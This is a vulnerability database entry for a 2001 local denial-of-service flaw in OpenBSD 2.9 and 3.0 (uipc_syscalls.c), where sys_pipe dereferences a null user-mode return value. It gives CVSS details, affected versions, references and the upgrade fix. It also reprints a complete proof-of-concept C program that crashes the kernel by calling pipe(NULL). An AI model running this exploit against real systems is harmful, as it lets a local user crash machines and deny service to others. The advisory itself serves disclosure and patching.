Published: 2001-12-31 00:00:00
Revised: 2008-09-05 16:26:51

[Original] The uipc system calls (uipc_syscalls.c) in OpenBSD 2.9 and 3.0 provide user mode return instead of versus rval kernel mode values to the fdrelease function, which allows local users to cause a denial of service and trigger a null dereference.

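[CNNVD] OpenBSD uipc system call (uipc_syscalls.c) vulnerability (CNNVD-200112-251)

        The uipc system calls (uipc_syscalls.c) in OpenBSD 2.9 and 3.0 provide the user-mode return value instead of the kernel-mode rval value to the fdrelease function. Local users can exploit this vulnerability to cause a denial of service and trigger a null dereference.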

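- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may reduce performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]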

- CPE (affected platforms and products)

cpe:/o:openbsd:openbsd:2.9  OpenBSD 2.9
cpe:/o:openbsd:openbsd:3.0  OpenBSD 3.0

- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  XF  openbsd-retval-null-dos(7690)
(UNKNOWN)  MLIST  [OpenBSD] 20011202 Code that crashes kernel at will + proposed patch
(UNKNOWN)  BUGTRAQ  20011202 OpenBSD local DoS

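- Vulnerability information

OpenBSD uipc system call (uipc_syscalls.c) vulnerability
Low risk  Unknown
2001-12-31 00:00:00 2006-01-27 00:00:00
        The uipc system calls (uipc_syscalls.c) in OpenBSD 2.9 and 3.0 provide the user-mode return value instead of the kernel-mode rval value to the fdrelease function. Local users can exploit this vulnerability to cause a denial of service and trigger a null dereference.

- Advisories and patches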


- Vulnerability information (21167)

OpenBSD 2.x/3.0 User Mode Return Value Denial Of Service Vulnerability (EDBID:21167)
openbsd local
2001-12-03 Verified
0 Marco Peereboom
N/A

OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation.

Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately.

This makes it possible for a malicious local user to deny service to legitimate users of the system.

/* obsd-crashme.c - by Marco Peereboom <> */
/* December 03, 2001 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdarg.h>
#include <syslog.h>

/* globals */
int fd[8]; /* temp pipe file descriptors */
int fd_real[4]; /* real pipes */

static int __DEBUG__  = 0;
static int __SYSLOG__  = 0;

void enable_debug(void)
{
         __DEBUG__ = 1;
}

void disable_debug(void)
{
         __DEBUG__ = 0;
}

void enable_syslog(void)
{
         __SYSLOG__ = 1;
}

void disable_syslog(void)
{
         __SYSLOG__ = 0;
}

/* print to a stream and/or syslog, depending on the debug flags */
void s_fprintf(FILE *file, const char *fmt, ...)
{
         va_list ap;

         if (__DEBUG__) {
                 va_start(ap, fmt);
                 vfprintf(file, fmt, ap);
                 va_end(ap);
         }

         if (__SYSLOG__) {
                 va_start(ap, fmt);
                 vsyslog(LOG_INFO, fmt, ap);
                 va_end(ap);
         }
}

/* malloc wrapper that reports the failure and exits */
void *s_malloc(size_t size)
{
         char serr[40]; /* cannot allocate more memory, so use this ugly beast */
         void *p;

         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%lu)\n",
                     (int)getpid(), (int)getppid(), (unsigned long)size);
         }

         if ((p = malloc(size)) == NULL) {
                 snprintf(serr, sizeof(serr),
                     "PID=%i, Could not allocate memory", (int)getpid());
                 perror(serr);
                 exit(1);
         }

         return p;
}

/* perror wrapper that prefixes the PID and exits */
void s_perror(const char *str)
{
         char *buf;
         size_t len;

         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n",
                     (int)getpid(), (int)getppid(), str);
         }

         len = 11 + strlen(str); /* PID=%-5i = 11 chars */
         buf = s_malloc(len);
         snprintf(buf, len, "PID=%-5i %s", (int)getpid(), str);
         perror(buf);
         free(buf);
         exit(1); /* main() relies on s_pipe() exiting on failure */
}

/* pipe wrapper that exits if pipe() reports an error */
void s_pipe(int *fd)
{
         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%p)\n",
                     (int)getpid(), (int)getppid(), (void *)fd);
         }

         if (pipe(fd) == -1)
                 s_perror("Could not create pipe");
}

int main(int argc, char **argv)
{
         fprintf(stderr, "Before pipe\n");
         s_pipe(NULL); /* test if s_pipe exits */
         fprintf(stderr, "Will never reach this\n");

         return 0;
}

- Vulnerability information

OpenBSD uipc System Calls Null Dereference Local DoS
Local Access Required Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

OpenBSD contains a flaw that may allow a local denial of service. The issue is triggered when a malicious attacker causes the sys_pipe() function to encounter a certain file descriptor error. This will cause sys_pipe() to dereference the user mode retval value instead of the rval kernel mode value. As retval is NULL, this will result in loss of availability for the platform.

- Timeline

2001-12-02 Unknown
2001-12-02 Unknown

- Solution

Upgrade to version 3.1 or higher, as it has been reported to fix this vulnerability. In addition, the creditee has released patches for some older versions. It is also possible to correct the flaw by implementing the following workaround: harden your OpenBSD system with the "Stephanie" TPE (trusted path execution) kernel patch.

- Related references

- Vulnerability author